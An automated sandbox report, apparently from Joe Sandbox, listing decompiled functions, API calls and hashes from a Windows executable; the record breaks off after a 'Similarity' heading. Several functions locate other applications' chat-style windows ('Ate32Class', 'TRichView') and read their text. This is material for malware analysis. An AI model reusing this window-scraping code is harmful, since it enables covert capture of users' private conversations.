Instruction ID: 26fb620d57a73318d47b04f2923db2dc571e5f65638a0b84f9cf138c446bb98a
Opcode Fuzzy Hash: 330946893fc0247122092e15f6b359f6f33634cb2bca5c83113eb70742dbad66
Instruction Fuzzy Hash: E5119171C01249EADB10FBE5D946BEEBB78AF19308F50459EB401A71C2DBBC5B08C769

Uniqueness

Uniqueness Score: -1.00%

Function 0040F5A5, Relevance: 21.1, APIs: 14, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E0040F5A5(intOrPtr* __ecx) {
				intOrPtr* _t44;
				intOrPtr _t53;
				void* _t59;
				intOrPtr* _t82;
				void* _t84;
				intOrPtr _t86;

				E0043E4E0(0x440354, _t84);
				_push(__ecx);
				_push(__ecx);
				_t82 = __ecx;
				 *((intOrPtr*)(_t84 - 0x10)) = _t86;
				 *((intOrPtr*)(_t84 - 0x14)) = __ecx;
				L0043DDD8();
				 *(_t84 - 4) =  *(_t84 - 4) & 0x00000000;
				L0043DDD8();
				 *(_t84 - 4) = 1;
				L0043DDD8();
				_t59 = __ecx + 0x14;
				 *(_t84 - 4) = 2;
				L0043DDD8();
				_t44 =  *((intOrPtr*)(_t84 + 0xc));
				_t53 =  *((intOrPtr*)(_t84 + 8));
				_t88 = _t44;
				 *(_t84 - 4) = 3;
				 *((intOrPtr*)(__ecx + 4)) = _t53;
				if(_t44 == 0) {
					_push(_t44);
					_push(_t53);
					_t44 = E0040FB99(_t59, _t88);
				}
				 *_t82 = _t44;
				if( *((intOrPtr*)(_t84 + 0x10)) != 0) {
					_push( *((intOrPtr*)(_t84 + 0x10)));
					L0043DDD2();
				} else {
					_push( *((intOrPtr*)( *_t44))(_t84 + 0x10, _t53));
					 *(_t84 - 4) = 4;
					L0043DFCA();
					 *(_t84 - 4) = 3;
					L0043DD36();
				}
				if( *((intOrPtr*)(_t84 + 0x14)) != 0) {
					_push( *((intOrPtr*)(_t84 + 0x14)));
					L0043DDD2();
				} else {
					_push(_t53);
					_push(_t84 + 0x10);
					 *(_t84 - 4) = 5;
					_push(E0040FEA7());
					 *(_t84 - 4) = 6;
					L0043DFCA();
					 *(_t84 - 4) = 5;
					L0043DD36();
					 *(_t84 - 4) = 3;
				}
				if( *((intOrPtr*)(_t84 + 0x18)) != 0) {
					_push( *((intOrPtr*)(_t84 + 0x18)));
					L0043DDD2();
				} else {
					 *(_t84 - 4) = 8;
					_push( *((intOrPtr*)( *((intOrPtr*)( *_t82)) + 4))(_t84 + 0x10, _t53));
					 *(_t84 - 4) = 9;
					L0043DFCA();
					 *(_t84 - 4) = 8;
					L0043DD36();
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t84 - 0xc));
				return _t82;
			}

0x0040f5aa
0x0040f5af
0x0040f5b0
0x0040f5b3
0x0040f5b6
0x0040f5b9
0x0040f5bf
0x0040f5c4
0x0040f5cb
0x0040f5d3
0x0040f5d9
0x0040f5de
0x0040f5e1
0x0040f5e5
0x0040f5ea
0x0040f5ed
0x0040f5f0
0x0040f5f2
0x0040f5f6
0x0040f5f9
0x0040f5fb
0x0040f5fc
0x0040f5fd
0x0040f603
0x0040f608
0x0040f60a
0x0040f631
0x0040f636
0x0040f60c
0x0040f617
0x0040f61a
0x0040f61e
0x0040f626
0x0040f62a
0x0040f62a
0x0040f63f
0x0040f691
0x0040f697
0x0040f641
0x0040f644
0x0040f645
0x0040f646
0x0040f651
0x0040f655
0x0040f659
0x0040f661
0x0040f665
0x0040f688
0x0040f688
0x0040f6a0
0x0040f6e8
0x0040f6ee
0x0040f6a2
0x0040f6ab
0x0040f6b2
0x0040f6b6
0x0040f6ba
0x0040f6c2
0x0040f6c6
0x0040f6c6
0x0040f6fa
0x0040f703

APIs

__EH_prolog.LIBCMT ref: 0040F5AA
#540.MFC42(00000000,?,00000000,?,?,0040F372,?,?,?,?,?), ref: 0040F5BF
#540.MFC42(00000000,?,00000000,?,?,0040F372,?,?,?,?,?), ref: 0040F5CB
#540.MFC42(00000000,?,00000000,?,?,0040F372,?,?,?,?,?), ref: 0040F5D9
#540.MFC42(00000000,?,00000000,?,?,0040F372,?,?,?,?,?), ref: 0040F5E5
#858.MFC42(00000000,?,00000000,?,?,0040F372,?,?,?,?,?), ref: 0040F61E
#800.MFC42(00000000,?,00000000,?,?,0040F372,?,?,?,?,?), ref: 0040F62A
#860.MFC42(00000000,00000000,?,00000000,?,?,0040F372,?,?,?,?,?), ref: 0040F636
#858.MFC42(00000000,00000000,00000000,?,00000000,?,?,0040F372,?,?,?,?,?), ref: 0040F659
#800.MFC42(00000000,00000000,00000000,?,00000000,?,?,0040F372,?,?,?,?,?), ref: 0040F665
#858.MFC42(00000000,?,00000000,?,?,0040F372,?,?,?,?,?), ref: 0040F6BA
#800.MFC42(00000000,?,00000000,?,?,0040F372,?,?,?,?,?), ref: 0040F6C6

Part of subcall function 0040FB99: __EH_prolog.LIBCMT ref: 0040FB9E
Part of subcall function 0040FB99: GetClassNameA.USER32(?,?,0000001E), ref: 0040FBBA

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #540$#800#858$H_prolog$#860ClassName
String ID:
API String ID: 3314927051-0
Opcode ID: 4a85a00f2d844629ea886a87e98f695ae56b38056590e7406cc5501f0e8e7ea0
Instruction ID: 06de775336df9c36160dbb2dd3e60fc8e1940705639a5333776814398150c1b1
Opcode Fuzzy Hash: 4a85a00f2d844629ea886a87e98f695ae56b38056590e7406cc5501f0e8e7ea0
Instruction Fuzzy Hash: CB41D270804249DFDB25DF65D845BAEBBB8EF19308F10486EF442632D1DB786A09C766

Uniqueness

Uniqueness Score: -1.00%

Function 0040984B, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E0040984B() {
				void* _t33;
				intOrPtr* _t36;
				intOrPtr _t37;
				void* _t38;
				void* _t59;
				intOrPtr _t62;
				void* _t64;

				E0043E4E0(0x43f8a3, _t64);
				 *((intOrPtr*)(_t64 - 0x1c)) = 0;
				_push(FindWindowExA(E0040FE29( *((intOrPtr*)(_t64 + 0xc)), "WndAte32Class", 0), 0, "Ate32Class", 0));
				_push(_t64 - 0x14);
				_t33 = E0040FEA7();
				_t62 = 1;
				_push(0x3e);
				_push(_t33);
				 *((intOrPtr*)(_t64 - 4)) = _t62;
				_push(_t64 + 0xc);
				L0043E14A();
				 *((char*)(_t64 - 4)) = 3;
				L0043DD36();
				_push( *((intOrPtr*)(_t64 + 0xc)));
				_t36 =  *((intOrPtr*)(E00409643(_t64 - 0x18)));
				 *((char*)(_t64 - 4)) = 4;
				if(_t36 == 0) {
					_t37 = 0;
				} else {
					_t37 =  *_t36;
				}
				_t38 = E00429262(_t64 - 0x10, _t37, _t64 - 0x10);
				_t59 = _t38;
				 *((char*)(_t64 - 4)) = 3;
				_t51 =  *((intOrPtr*)(_t64 - 0x18));
				if( *((intOrPtr*)(_t64 - 0x18)) != 0) {
					_t38 = E004096DD(_t51);
				}
				if(_t59 != 0) {
					L0043E144();
					 *((char*)(_t64 - 4)) = 5;
					L0043DFCA();
					 *((char*)(_t64 - 4)) = 3;
					L0043DD36();
					__imp__#6( *((intOrPtr*)(_t64 - 0x10)), _t38,  *((intOrPtr*)(_t64 - 0x10)));
				}
				_push(_t64 + 0xc);
				L0043DD3C();
				 *((intOrPtr*)(_t64 - 0x1c)) = _t62;
				 *((char*)(_t64 - 4)) = 0;
				L0043DD36();
				 *[fs:0x0] =  *((intOrPtr*)(_t64 - 0xc));
				return  *((intOrPtr*)(_t64 + 8));
			}

0x00409850
0x00409862
0x0040987e
0x00409882
0x00409883
0x0040988c
0x0040988d
0x0040988f
0x00409893
0x00409896
0x00409897
0x0040989f
0x004098a3
0x004098a8
0x004098b3
0x004098b5
0x004098bb
0x004098c1
0x004098bd
0x004098bd
0x004098bd
0x004098c9
0x004098cf
0x004098d2
0x004098d6
0x004098db
0x004098dd
0x004098dd
0x004098e5
0x004098ed
0x004098f6
0x004098fa
0x00409902
0x00409906
0x0040990e
0x0040990e
0x0040991a
0x0040991b
0x00409920
0x00409926
0x00409929
0x00409936
0x0040993e

APIs

__EH_prolog.LIBCMT ref: 00409850

Part of subcall function 0040FE29: FindWindowExA.USER32 ref: 0040FE43

FindWindowExA.USER32 ref: 00409878

Part of subcall function 0040FEA7: __EH_prolog.LIBCMT ref: 0040FEAC
Part of subcall function 0040FEA7: IsWindow.USER32(?), ref: 0040FEC5
Part of subcall function 0040FEA7: SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 0040FEDC
Part of subcall function 0040FEA7: #823.MFC42(-000000C5), ref: 0040FEEA
Part of subcall function 0040FEA7: memset.MSVCRT ref: 0040FEF7
Part of subcall function 0040FEA7: SendMessageA.USER32(?,0000000D,-000000CA,?), ref: 0040FF0B
Part of subcall function 0040FEA7: #537.MFC42(?), ref: 0040FF13
Part of subcall function 0040FEA7: #825.MFC42(?,?), ref: 0040FF1F
Part of subcall function 0040FEA7: #535.MFC42(?,?), ref: 0040FF2C
Part of subcall function 0040FEA7: #800.MFC42(?,?), ref: 0040FF38

#923.MFC42(?,00000000,0000003E), ref: 00409897
#800.MFC42(?,00000000,0000003E), ref: 004098A3

Part of subcall function 00409643: __EH_prolog.LIBCMT ref: 00409648
Part of subcall function 00409643: #823.MFC42(0000000C,?,?,00429CB7,?,?), ref: 00409653

#539.MFC42(?,?,?,00000000,0000003E), ref: 004098ED
#858.MFC42(00000000,?,?,?,00000000,0000003E), ref: 004098FA
#800.MFC42(00000000,?,?,?,00000000,0000003E), ref: 00409906
SysFreeString.OLEAUT32(?), ref: 0040990E
#535.MFC42(?,?,?,00000000,0000003E), ref: 0040991B
#800.MFC42(?,?,?,00000000,0000003E), ref: 00409929

Strings

WndAte32Class, xrefs: 0040985D
Ate32Class, xrefs: 00409871

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800$H_prologWindow$#535#823FindMessageSend$#537#539#825#858#923FreeStringmemset
String ID: Ate32Class$WndAte32Class
API String ID: 1302643171-1677065709
Opcode ID: 5123dbc4999fadf7a5c21fb31d768d28b9a0d198653586aa49adbb4b3d069060
Instruction ID: 543d6a717def23cc1c236db71f6401ab62495e83e32b84bc9a6a3614d1949366
Opcode Fuzzy Hash: 5123dbc4999fadf7a5c21fb31d768d28b9a0d198653586aa49adbb4b3d069060
Instruction Fuzzy Hash: C2319F72D00149AEDF15EFA5D885AEEBB78EF15358F10842FF81167282DA385F08CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0040954D, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E0040954D() {
				void* _t33;
				intOrPtr* _t36;
				intOrPtr _t37;
				void* _t38;
				void* _t59;
				intOrPtr _t62;
				void* _t64;

				E0043E4E0(0x43f80b, _t64);
				 *((intOrPtr*)(_t64 - 0x1c)) = 0;
				_push(FindWindowExA(E0040FE29( *((intOrPtr*)(_t64 + 0xc)), "WndAte32Class", 0), 0, "Ate32Class", 0));
				_push(_t64 - 0x14);
				_t33 = E0040FEA7();
				_t62 = 1;
				_push(0x3e);
				_push(_t33);
				 *((intOrPtr*)(_t64 - 4)) = _t62;
				_push(_t64 + 0xc);
				L0043E14A();
				 *((char*)(_t64 - 4)) = 3;
				L0043DD36();
				_push( *((intOrPtr*)(_t64 + 0xc)));
				_t36 =  *((intOrPtr*)(E00409643(_t64 - 0x18)));
				 *((char*)(_t64 - 4)) = 4;
				if(_t36 == 0) {
					_t37 = 0;
				} else {
					_t37 =  *_t36;
				}
				_t38 = E00429262(_t64 - 0x10, _t37, _t64 - 0x10);
				_t59 = _t38;
				 *((char*)(_t64 - 4)) = 3;
				_t51 =  *((intOrPtr*)(_t64 - 0x18));
				if( *((intOrPtr*)(_t64 - 0x18)) != 0) {
					_t38 = E004096DD(_t51);
				}
				if(_t59 != 0) {
					L0043E144();
					 *((char*)(_t64 - 4)) = 5;
					L0043DFCA();
					 *((char*)(_t64 - 4)) = 3;
					L0043DD36();
					__imp__#6( *((intOrPtr*)(_t64 - 0x10)), _t38,  *((intOrPtr*)(_t64 - 0x10)));
				}
				_push(_t64 + 0xc);
				L0043DD3C();
				 *((intOrPtr*)(_t64 - 0x1c)) = _t62;
				 *((char*)(_t64 - 4)) = 0;
				L0043DD36();
				 *[fs:0x0] =  *((intOrPtr*)(_t64 - 0xc));
				return  *((intOrPtr*)(_t64 + 8));
			}

0x00409552
0x00409564
0x00409580
0x00409584
0x00409585
0x0040958e
0x0040958f
0x00409591
0x00409595
0x00409598
0x00409599
0x004095a1
0x004095a5
0x004095aa
0x004095b5
0x004095b7
0x004095bd
0x004095c3
0x004095bf
0x004095bf
0x004095bf
0x004095cb
0x004095d1
0x004095d4
0x004095d8
0x004095dd
0x004095df
0x004095df
0x004095e7
0x004095ef
0x004095f8
0x004095fc
0x00409604
0x00409608
0x00409610
0x00409610
0x0040961c
0x0040961d
0x00409622
0x00409628
0x0040962b
0x00409638
0x00409640

APIs

__EH_prolog.LIBCMT ref: 00409552

Part of subcall function 0040FE29: FindWindowExA.USER32 ref: 0040FE43

FindWindowExA.USER32 ref: 0040957A

Part of subcall function 0040FEA7: __EH_prolog.LIBCMT ref: 0040FEAC
Part of subcall function 0040FEA7: IsWindow.USER32(?), ref: 0040FEC5
Part of subcall function 0040FEA7: SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 0040FEDC
Part of subcall function 0040FEA7: #823.MFC42(-000000C5), ref: 0040FEEA
Part of subcall function 0040FEA7: memset.MSVCRT ref: 0040FEF7
Part of subcall function 0040FEA7: SendMessageA.USER32(?,0000000D,-000000CA,?), ref: 0040FF0B
Part of subcall function 0040FEA7: #537.MFC42(?), ref: 0040FF13
Part of subcall function 0040FEA7: #825.MFC42(?,?), ref: 0040FF1F
Part of subcall function 0040FEA7: #535.MFC42(?,?), ref: 0040FF2C
Part of subcall function 0040FEA7: #800.MFC42(?,?), ref: 0040FF38

#923.MFC42(?,00000000,0000003E), ref: 00409599
#800.MFC42(?,00000000,0000003E), ref: 004095A5

Part of subcall function 00409643: __EH_prolog.LIBCMT ref: 00409648
Part of subcall function 00409643: #823.MFC42(0000000C,?,?,00429CB7,?,?), ref: 00409653

#539.MFC42(?,?,?,00000000,0000003E), ref: 004095EF
#858.MFC42(00000000,?,?,?,00000000,0000003E), ref: 004095FC
#800.MFC42(00000000,?,?,?,00000000,0000003E), ref: 00409608
SysFreeString.OLEAUT32(?), ref: 00409610
#535.MFC42(?,?,?,00000000,0000003E), ref: 0040961D
#800.MFC42(?,?,?,00000000,0000003E), ref: 0040962B

Strings

WndAte32Class, xrefs: 0040955F
Ate32Class, xrefs: 00409573

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800$H_prologWindow$#535#823FindMessageSend$#537#539#825#858#923FreeStringmemset
String ID: Ate32Class$WndAte32Class
API String ID: 1302643171-1677065709
Opcode ID: d9b36a48d130591d4ea3f3a2c474b6e11e4af3cf41420fde571594f4e9d743c2
Instruction ID: bf27cd23291cbb31f4aaf92191929221c707622a68c4df41b4ffb47f979df033
Opcode Fuzzy Hash: d9b36a48d130591d4ea3f3a2c474b6e11e4af3cf41420fde571594f4e9d743c2
Instruction Fuzzy Hash: C8318D72D04149AEDB15EFA5D885AEEBB78EB14358F10842FF415A7282DA385E08CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0040A630, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0040A630() {
				struct HWND__* _t20;
				struct HWND__* _t21;
				struct HWND__* _t26;
				CHAR* _t39;
				intOrPtr _t43;
				void* _t45;

				E0043E4E0(0x43fa93, _t45);
				_t39 = "TPanel";
				 *((intOrPtr*)(_t45 - 0x18)) = 0;
				_t20 = FindWindowExA( *(_t45 + 0xc), 0, _t39, 0);
				 *(_t45 - 0x14) = _t20;
				if(_t20 != 0) {
					_t21 = FindWindowExA(_t20, 0, "TRichView", 0);
					if(_t21 != 0) {
						L6:
						_push(_t21);
						_push(_t45 - 0x10);
						E0040FEA7();
						_t43 = 1;
						_push(0x4550cc);
						_push("\r\r");
						 *((intOrPtr*)(_t45 - 4)) = _t43;
						L0043E156();
						_push(_t45 - 0x10);
						L0043DD3C();
						 *((intOrPtr*)(_t45 - 0x18)) = _t43;
						 *((char*)(_t45 - 4)) = 0;
						L0043DD36();
					} else {
						_t26 = FindWindowExA( *(_t45 + 0xc),  *(_t45 - 0x14), _t39, 0);
						if(_t26 == 0) {
							L5:
							_push(0x4550cc);
							L0043DE26();
						} else {
							_t21 = FindWindowExA(_t26, 0, "TRichView", 0);
							if(_t21 != 0) {
								goto L6;
							} else {
								goto L5;
							}
						}
					}
				} else {
					_push(0x4550cc);
					L0043DE26();
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t45 - 0xc));
				return  *((intOrPtr*)(_t45 + 8));
			}

0x0040a635
0x0040a648
0x0040a650
0x0040a656
0x0040a65a
0x0040a65d
0x0040a676
0x0040a67a
0x0040a6a7
0x0040a6a7
0x0040a6ab
0x0040a6ac
0x0040a6b8
0x0040a6b9
0x0040a6be
0x0040a6c3
0x0040a6c6
0x0040a6d1
0x0040a6d2
0x0040a6da
0x0040a6dd
0x0040a6e0
0x0040a67c
0x0040a684
0x0040a688
0x0040a698
0x0040a69b
0x0040a6a0
0x0040a68a
0x0040a692
0x0040a696
0x00000000
0x00000000
0x00000000
0x00000000
0x0040a696
0x0040a688
0x0040a65f
0x0040a662
0x0040a667
0x0040a667
0x0040a6ee
0x0040a6f6

APIs

__EH_prolog.LIBCMT ref: 0040A635
FindWindowExA.USER32 ref: 0040A656
#537.MFC42(004550CC), ref: 0040A667
FindWindowExA.USER32 ref: 0040A676
FindWindowExA.USER32 ref: 0040A684
FindWindowExA.USER32 ref: 0040A692
#537.MFC42(004550CC), ref: 0040A6A0

Strings

TPanel, xrefs: 0040A648, 0040A64E, 0040A67D
TRichView, xrefs: 0040A66F, 0040A68B

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: FindWindow$#537$H_prolog
String ID: TPanel$TRichView
API String ID: 43785774-1228822619
Opcode ID: 6334591ac2e13ce4c82cf13ed98ea833672b3853df58e0836613418795b6380a
Instruction ID: f4e50c7187afc8239c52be61a37fa561c6d9ca64e63d61990f1d6ebd13e33fad
Opcode Fuzzy Hash: 6334591ac2e13ce4c82cf13ed98ea833672b3853df58e0836613418795b6380a
Instruction Fuzzy Hash: 5D216571A00609BECB10EF91DC81DAFBB7CEB58759F10483FF514A7581D6395A0887A9

Uniqueness

Uniqueness Score: -1.00%

Function 0041F58A, Relevance: 21.1, APIs: 14, Instructions: 72
windowCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E0041F58A(signed int __ecx, void* __edi) {
				void* __ebx;
				void* __esi;
				signed int _t26;
				long _t30;
				void* _t45;
				void* _t46;
				signed int _t48;
				signed int _t49;
				void* _t51;

				_t46 = __edi;
				E0043E4E0(0x441d88, _t51);
				_t48 = __ecx;
				_t30 = SendMessageA( *( *((intOrPtr*)(__ecx + 0x98)) + 0x20), 0x100c, 0xffffffff, 2);
				if(_t30 == 0xffffffff) {
					_t30 = 0;
				}
				L0043DDD8();
				 *(_t51 - 4) =  *(_t51 - 4) & 0x00000000;
				_push(_t51 - 0x10);
				_push(0x42d);
				L0043E2E2();
				_push(0);
				L00413FE9(_t51 - 0x10, _t30, _t51 - 0x70, _t45, _t48);
				_push(_t48);
				_push(0xba);
				 *(_t51 - 4) = 1;
				L0043E0BA();
				_push(_t30);
				_push(_t51 - 0x10);
				_t26 = L0041D8CD(_t51 - 0x10, _t30, _t46, _t48);
				if(_t26 != 0) {
					L0043DEF2();
					L0043E300();
					_t49 = _t26;
				} else {
					L0043DEF2();
					_push(0xffffffff);
					_push(0x10);
					_push(0xe030);
					L0043E2CA();
					_push(GetParent( *(_t48 + 0x20)));
					L0043DD9C();
					_push(0);
					L0043E3A8();
					_t49 = _t48 | 0xffffffff;
				}
				 *(_t51 - 4) =  *(_t51 - 4) & 0x00000000;
				L0043E04E();
				 *(_t51 - 4) =  *(_t51 - 4) | 0xffffffff;
				L0043DD36();
				 *[fs:0x0] =  *((intOrPtr*)(_t51 - 0xc));
				return _t49;
			}

0x0041f58a
0x0041f58f
0x0041f599
0x0041f5b3
0x0041f5b8
0x0041f5ba
0x0041f5ba
0x0041f5bf
0x0041f5c4
0x0041f5cb
0x0041f5cc
0x0041f5d3
0x0041f5d8
0x0041f5dd
0x0041f5e2
0x0041f5e3
0x0041f5eb
0x0041f5ef
0x0041f5f7
0x0041f5f8
0x0041f5f9
0x0041f605
0x0041f637
0x0041f63e
0x0041f643
0x0041f607
0x0041f607
0x0041f60c
0x0041f60e
0x0041f610
0x0041f615
0x0041f623
0x0041f624
0x0041f629
0x0041f62d
0x0041f632
0x0041f632
0x0041f645
0x0041f64c
0x0041f651
0x0041f658
0x0041f664
0x0041f66c

APIs

__EH_prolog.LIBCMT ref: 0041F58F
SendMessageA.USER32(?,0000100C,000000FF,00000002), ref: 0041F5AD
#540.MFC42 ref: 0041F5BF
#3097.MFC42(0000042D,?), ref: 0041F5D3
#2086.MFC42(000000BA), ref: 0041F5EF
#2446.MFC42 ref: 0041F607
#1199.MFC42(0000E030,00000010,000000FF), ref: 0041F615
GetParent.USER32(?), ref: 0041F61D
#2864.MFC42(00000000), ref: 0041F624
#2646.MFC42(00000000,00000000), ref: 0041F62D
#2446.MFC42 ref: 0041F637
#5162.MFC42 ref: 0041F63E
#641.MFC42(00000000,00000000), ref: 0041F64C
#800.MFC42(00000000,00000000), ref: 0041F658

Memory Dump Source

Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

